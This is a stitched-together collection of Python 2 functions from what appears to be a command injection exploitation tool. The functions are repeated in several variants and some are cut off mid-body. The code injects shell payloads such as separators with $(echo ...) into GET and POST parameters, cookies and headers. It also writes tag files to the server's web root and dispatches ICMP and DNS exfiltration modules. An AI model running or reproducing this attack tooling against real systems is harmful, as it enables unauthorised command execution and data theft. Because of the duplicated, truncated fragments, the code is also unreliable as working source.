def icmp_exfiltration_handler(url, http_request_method):
# You need to have root privileges to run this script
if os.geteuid() != 0:
print "\n" + Back.RED + "(x) Error: You need to have root privileges to run this option." + Style.RESET_ALL
os._exit(0)
if http_request_method == "GET":
url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = urllib2.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = urllib2.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
os._exit(0)
def icmp_exfiltration_handler(url, http_request_method):
# You need to have root privileges to run this script
if os.geteuid() != 0:
print "\n" + Back.RED + settings.ERROR_SIGN + "You need to have root privileges to run this option." + Style.RESET_ALL
os._exit(0)
if http_request_method == "GET":
#url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = urllib2.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = urllib2.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print "\n" + Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
def icmp_exfiltration_handler(url,http_request_method):
# You need to have root privileges to run this script
if os.geteuid() != 0:
print colors.BGRED + "\n(x) Error: You need to have root privileges to run this option.\n" + colors.RESET
sys.exit(0)
if http_request_method == "GET":
url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = urllib2.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = urllib2.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter,url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
sys.exit(1)
def injection_test(payload, http_request_method, url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Encoding spaces.
payload = payload.replace(" ","%20")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
try:
# Get the response of the request
response = get_request_response(request)
except KeyboardInterrupt:
response = None
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
try:
data = json.loads(data, strict = False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
try:
# Get the response of the request
response = get_request_response(request)
except KeyboardInterrupt:
response = None
return response, vuln_parameter
def injection_test(payload, http_request_method, url):
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = get_request_response(request)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
data = json.loads(data, strict = False)
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = get_request_response(request)
end = time.time()
how_long = int(end - start)
return how_long, vuln_parameter
def post_request(url, http_request_method, filename, delay):
# Check if HTTP Method is POST.
parameter = menu.options.data
found_parameter = parameters.do_POST_check(parameter)
# Check if singe entry parameter
if type(found_parameter) is str:
found_parameter_list = []
found_parameter_list.append(found_parameter)
found_parameter = found_parameter_list
# Remove whitespaces
found_parameter = [x.replace(" ", "") for x in found_parameter]
# Check if multiple parameters
check_parameters = []
for i in range(0, len(found_parameter)):
parameter = menu.options.data = found_parameter[i]
check_parameter = parameters.vuln_POST_param(parameter, url)
check_parameters.append(check_parameter)
#if not menu.options.level > 1:
header_name = ""
checks.print_non_listed_params(check_parameters, http_request_method, header_name)
for i in range(0, len(found_parameter)):
parameter = menu.options.data = found_parameter[i]
check_parameter = parameters.vuln_POST_param(parameter, url)
if len(check_parameter) > 0:
settings.TESTABLE_PARAMETER = check_parameter
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
# Check for session file
check_for_stored_sessions(url, http_request_method)
injection_proccess(url, check_parameter, http_request_method, filename, delay)
else:
# Check for session file
check_for_stored_sessions(url, http_request_method)
injection_proccess(url, check_parameter, http_request_method, filename, delay)
def injection_test(payload, http_request_method, url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
if " " in payload:
payload = payload.replace(" ","%20")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = url.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request.
response = requests.get_request_response(request)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = parameter.replace("+","%2B")
# Define the POST data
if settings.IS_JSON:
payload = payload.replace("\"", "\\\"")
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
try:
data = json.loads(data, strict = False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
else:
if settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Get the response of the request.
response = requests.get_request_response(request)
return response, vuln_parameter
def injection_test(payload, http_request_method, url):
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
data = json.loads(data, strict = False)
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
raise SystemExit()
def icmp_exfiltration_handler(url,http_request_method):
# You need to have root privileges to run this script
if os.geteuid() != 0:
print colors.RED + "\n(x) Error: You need to have root privileges to run this option.\n" + colors.RESET
sys.exit(0)
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
request_data = vuln_parameter
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter,url)
request_data = vuln_parameter
ip_data = menu.options.ip_icmp_data
# Load the module ICMP_Exfiltration
try:
from src.core.modules import ICMP_Exfiltration
except ImportError as e:
print colors.RED + "(x) Error:", e
print colors.RESET
sys.exit(1)
technique = "ICMP exfiltration technique"
sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... \n" + colors.RESET)
sys.stdout.flush()
ip_src = re.findall(r"ip_src=(.*),", ip_data)
ip_src = ''.join(ip_src)
ip_dst = re.findall(r"ip_dst=(.*)", ip_data)
ip_dst = ''.join(ip_dst)
ICMP_Exfiltration.exploitation(ip_dst,ip_src,url,http_request_method,request_data)
def injection_test(payload,http_request_method,url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter,url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
sys.exit(1)
def dns_exfiltration_handler(url, http_request_method):
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
# You need to have root privileges to run this script
if os.geteuid() != 0:
err_msg = "You need to have root privileges to run this option."
print "\n" + settings.print_critical_msg(err_msg)
os._exit(0)
if http_request_method == "GET":
#url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = urllib2.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = urllib2.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print "\n" + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
def icmp_exfiltration_handler(url, http_request_method):
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
# You need to have root privileges to run this script
if os.geteuid() != 0:
err_msg = "You need to have root privileges to run this option."
print settings.print_critical_msg(err_msg) + "\n"
os._exit(0)
if http_request_method == "GET":
#url = parameters.do_GET_check(url)
request = urllib2.Request(url)
headers.do_check(request)
vuln_parameter = parameters.vuln_GET_param(url)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = urllib2.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print "\n" + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(
err) + Style.RESET_ALL
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err:
def exploitation(url,delay,filename,http_request_method):
counter = 0
vp_flag = True
no_result = True
is_encoded= False
stop_injection = False
injection_type = "Semiblind-based Command Injection"
technique = "file-based semiblind injection technique"
sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET)
sys.stdout.flush()
# Print the findings to log file.
output_file = open(filename + ".txt", "a")
output_file.write("\n---")
output_file.write("\n(+) Type : " + injection_type)
output_file.write("\n(+) Technique : " + technique.title())
output_file.close()
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for seperator in settings.SEPERATORS:
# Check for bad combination of prefix and seperator
combination = prefix + seperator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
# Check if defined "--base64" option.
if menu.options.base64_trick == True:
B64_ENC_TAG = base64.b64encode(TAG)
B64_DEC_TRICK = settings.B64_DEC_TRICK
else:
B64_ENC_TAG = TAG
B64_DEC_TRICK = ""
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = B64_ENC_TAG + ".txt"
sys.stdout.write( "\n(*) Trying to upload the '"+ OUTPUT_TEXTFILE +"' on "+settings.SRV_ROOT_DIR+"... ")
try:
payload = (seperator + " " +
"$(echo '" + B64_ENC_TAG + "'" + B64_DEC_TRICK + " >" + OUTPUT_TEXTFILE + ")"
)
# Check if defined "--prefix" option.
if menu.options.prefix:
prefix = menu.options.prefix
payload = prefix + payload
else:
payload = prefix + payload
# Check if defined "--suffix" option.
if menu.options.suffix:
suffix = menu.options.suffix
payload = payload + suffix
else:
payload = payload + suffix
#Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter,url)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
# Find the directory.
path = url
path_parts = path.split('/')
count = 0
for part in path_parts:
count = count + 1
count = count - 1
last_param = path_parts[count]
output = url.replace(last_param,OUTPUT_TEXTFILE)
time.sleep(delay)
try:
output = urllib2.urlopen(output)
html_data = output.read()
# If temp-based attack failed,
# use /tmp/ directory for temp-based.
except urllib2.HTTPError, e:
if e.getcode() == 404:
stop_injection = False
if menu.options.tmp_path:
tmp_path = menu.options.tmp_path
else:
tmp_path = settings.TMP_PATH
print colors.BOLD + colors.RED + "\n(x) Error: Unable to upload the '"+ OUTPUT_TEXTFILE +"' on '" + settings.SRV_ROOT_DIR + "'." + colors.RESET
sys.stdout.write("(*) Trying to upload the '"+ OUTPUT_TEXTFILE +"' on temporary directory (" + tmp_path + ")...\n")
tempfile_based.exploitation(url,delay,filename,tmp_path,http_request_method)
sys.exit(0)
def post_request(url, http_request_method, filename, timesec):
# Check if HTTP Method is POST.
parameter = menu.options.data
found_parameter = parameters.do_POST_check(parameter)
# Check if singe entry parameter
if type(found_parameter) is str:
found_parameter_list = []
found_parameter_list.append(found_parameter)
found_parameter = found_parameter_list
# Remove whitespaces
found_parameter = [x.replace(" ", "") for x in found_parameter]
# Check if multiple parameters
check_parameters = []
for i in range(0, len(found_parameter)):
parameter = menu.options.data = found_parameter[i]
check_parameter = parameters.vuln_POST_param(parameter, url)
check_parameters.append(check_parameter)
header_name = ""
checks.print_non_listed_params(check_parameters, http_request_method,
header_name)
for i in range(0, len(found_parameter)):
parameter = menu.options.data = found_parameter[i]
check_parameter = parameters.vuln_POST_param(parameter, url)
if check_parameter != parameter:
if len(check_parameter) > 0:
settings.TESTABLE_PARAMETER = check_parameter
# Check if testable parameter(s) are provided
if len(settings.TESTABLE_PARAMETER) > 0:
if menu.options.test_parameter != None:
param_counter = 0
for check_parameter in check_parameters:
if check_parameter in "".join(
settings.TEST_PARAMETER).split(","):
menu.options.data = found_parameter[param_counter]
check_for_stored_sessions(url, http_request_method)
injection_proccess(url, check_parameter,
http_request_method, filename,
timesec)
param_counter += 1
break
else:
# Check for session file
check_for_stored_sessions(url, http_request_method)
injection_proccess(url, check_parameter,
http_request_method, filename, timesec)
else:
# Check for session file
check_for_stored_sessions(url, http_request_method)
injection_proccess(url, check_parameter, http_request_method,
filename, timesec)
# Enable Cookie Injection
if menu.options.level > settings.DEFAULT_INJECTION_LEVEL and menu.options.cookie:
settings.COOKIE_INJECTION = True
def classic_exploitation_handler(url,delay,filename,http_request_method):
counter = 0
vp_flag = True
no_result = True
is_encoded= False
injection_type = "Results-based Command Injection"
technique = "classic injection technique"
sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET)
sys.stdout.flush()
# Print the findings to log file.
output_file = open(filename + ".txt", "a")
output_file.write("\n---")
output_file.write("\n(+) Type : " + injection_type)
output_file.write("\n(+) Technique : " + technique.title())
output_file.close()
for whitespace in settings.WHITESPACES:
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for seperator in settings.SEPERATORS:
# Check for bad combination of prefix and seperator
combination = prefix + seperator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
# Check if defined "--base64" option.
if menu.options.base64_trick == True:
B64_ENC_TAG = base64.b64encode(TAG)
B64_DEC_TRICK = settings.B64_DEC_TRICK
else:
B64_ENC_TAG = TAG
B64_DEC_TRICK = ""
try:
payload = (seperator +
"echo '" + TAG + "'" +
"$(echo '" + B64_ENC_TAG + "'" + B64_DEC_TRICK + ")'" + TAG + "'"
)
# Check if defined "--prefix" option.
if menu.options.prefix:
prefix = menu.options.prefix
payload = prefix + payload
else:
payload = prefix + payload
# Check if defined "--suffix" option.
if menu.options.suffix:
suffix = menu.options.suffix
payload = payload + suffix
else:
payload = payload + suffix
if seperator == " " :
payload = re.sub(" ", "%20", payload)
else:
payload = re.sub(" ", whitespace, payload)
#Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter,url)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
html_data = response.read()
shell = re.findall(r""+TAG+TAG+TAG+"", html_data)
except:
def do_check(url, filename):
classic_state = False
eval_based_state = False
time_based_state = False
file_based_state = False
# Check if defined "--delay" option.
if menu.options.delay:
delay = menu.options.delay
else:
delay = settings.DELAY
# Do authentication if needed.
if menu.options.auth_url and menu.options.auth_data:
authentication.auth_process()
elif menu.options.auth_url or menu.options.auth_data:
print Back.RED + "(x) Error: You must specify both login panel URL and login parameters.\n" + Style.RESET_ALL
sys.exit(0)
else:
pass
# Check if HTTP Method is GET or POST.
header_name = ""
if not menu.options.data:
http_request_method = "GET"
check_parameter = parameters.vuln_GET_param(url)
the_type = " parameter "
else:
http_request_method = "POST"
parameter = menu.options.data
check_parameter = parameters.vuln_POST_param(parameter, url)
the_type = " parameter "
# Load modules
modules_handler.load_modules(url, http_request_method, filename)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
the_type = " HTTP header "
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
check_parameter = ""
the_type = " HTTP header "
# Referer Injection
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
check_parameter = ""
the_type = " HTTP header "
else :
pass
if len(check_parameter) != 0 :
check_parameter = " '" + check_parameter + "'"
print "(*) Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."
# Estimating the response time (in seconds)
delay, url_time_response = requests.estimate_response_time(url, delay)
# Check all injection techniques
if not menu.options.tech:
# Check if it is vulnerable to classic command injection technique.
if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
classic_state = True
# Check if it is vulnerable to eval-based command injection technique.
if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
eval_based_state = True
# Check if it is vulnerable to time-based blind command injection technique.
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
time_based_state = True
# Check if it is vulnerable to file-based semiblind command injection technique.
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
file_based_state = True
else:
# Check if it is vulnerable to classic command injection technique.
if "classic" in menu.options.tech or len(menu.options.tech) <= 4 and "c" in menu.options.tech:
# Check if classic results-based command injection technique succeeds.
if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
classic_state = True
elif menu.options.tech == "classic":
cb_handler.exploitation(url, delay, filename, http_request_method)
else:
classic_state = False
# Check if it is vulnerable to eval-based command injection technique.
if "eval-based" in menu.options.tech or len(menu.options.tech) <= 4 and "e" in menu.options.tech:
# Check if eval-based command injection technique succeeds.
if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
eval_based_state = True
elif menu.options.tech == "eval-based":
eb_handler.exploitation(url, delay, filename, http_request_method)
else:
eval_based_state = False
# Check if it is vulnerable to time-based blind command injection technique.
if "time-based" in menu.options.tech or len(menu.options.tech) <= 4 and "t" in menu.options.tech:
# Check if time-based blind command injection technique succeeds.
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
time_based_state = True
elif menu.options.tech == "time-based":
tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
else:
time_based_state = False
# Check if it is vulnerable to file-based semiblind command injection technique.
if "file-based" in menu.options.tech or len(menu.options.tech) <= 4 and "f" in menu.options.tech:
# Check if file-based semiblind command injection technique succeeds.
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
file_based_state = True
elif menu.options.tech == "file-based":
fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
else:
file_based_state = False
if classic_state == False and eval_based_state == False and time_based_state == False and file_based_state == False :
if http_request_method == "GET":
print Back.RED + "(x) The url '"+ url +"' appear to be not injectable." + Style.RESET_ALL
else:
print Back.RED + "(x) The '"+ parameter +"' parameter appear to be not injectable." + Style.RESET_ALL
else:
logs.logs_notification(filename)
sys.exit(0)
#eof
def do_check(url, filename):
classic_state = False
eval_based_state = False
time_based_state = False
file_based_state = False
# Check if defined "--delay" option.
if menu.options.delay:
delay = menu.options.delay
else:
delay = settings.DELAY
# Do authentication if needed.
if menu.options.auth_url and menu.options.auth_data:
authentication.auth_process()
elif menu.options.auth_url or menu.options.auth_data:
print Back.RED + "(x) Error: You must specify both login panel URL and login parameters.\n" + Style.RESET_ALL
sys.exit(0)
else:
pass
# Check if HTTP Method is GET or POST.
header_name = ""
if not menu.options.data:
http_request_method = "GET"
if not settings.COOKIE_INJECTION and not settings.USER_AGENT_INJECTION and not settings.REFERER_INJECTION:
url = parameters.do_GET_check(url)
check_parameter = parameters.vuln_GET_param(url)
the_type = " parameter "
else:
http_request_method = "POST"
parameter = menu.options.data
parameter = parameters.do_POST_check(parameter)
check_parameter = parameters.vuln_POST_param(parameter, url)
the_type = " parameter "
# Load modules
modules_handler.load_modules(url, http_request_method, filename)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
the_type = " HTTP header "
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
check_parameter = ""
the_type = " HTTP header "
# Referer Injection
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
check_parameter = ""
the_type = " HTTP header "
else:
pass
if len(check_parameter) != 0:
check_parameter = " '" + check_parameter + "'"
print "(*) Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."
# Estimating the response time (in seconds)
delay, url_time_response = requests.estimate_response_time(url, http_request_method, delay)
# Check all injection techniques
if not menu.options.tech:
# Check if it is vulnerable to classic command injection technique.
if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
classic_state = True
# Check if it is vulnerable to eval-based command injection technique.
if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
eval_based_state = True
# Check if it is vulnerable to time-based blind command injection technique.
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
time_based_state = True
# Check if it is vulnerable to file-based semiblind command injection technique.
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
file_based_state = True
else:
# Check if it is vulnerable to classic command injection technique.
if "classic" in menu.options.tech or len(menu.options.tech) <= 4 and "c" in menu.options.tech:
# Check if classic results-based command injection technique succeeds.
if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
classic_state = True
elif menu.options.tech == "classic":
cb_handler.exploitation(url, delay, filename, http_request_method)
else:
classic_state = False
# Check if it is vulnerable to eval-based command injection technique.
if "eval-based" in menu.options.tech or len(menu.options.tech) <= 4 and "e" in menu.options.tech:
# Check if eval-based command injection technique succeeds.
if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
eval_based_state = True
elif menu.options.tech == "eval-based":
eb_handler.exploitation(url, delay, filename, http_request_method)
else:
eval_based_state = False
# Check if it is vulnerable to time-based blind command injection technique.
if "time-based" in menu.options.tech or len(menu.options.tech) <= 4 and "t" in menu.options.tech:
# Check if time-based blind command injection technique succeeds.
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
time_based_state = True
elif menu.options.tech == "time-based":
tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
else:
time_based_state = False
# Check if it is vulnerable to file-based semiblind command injection technique.
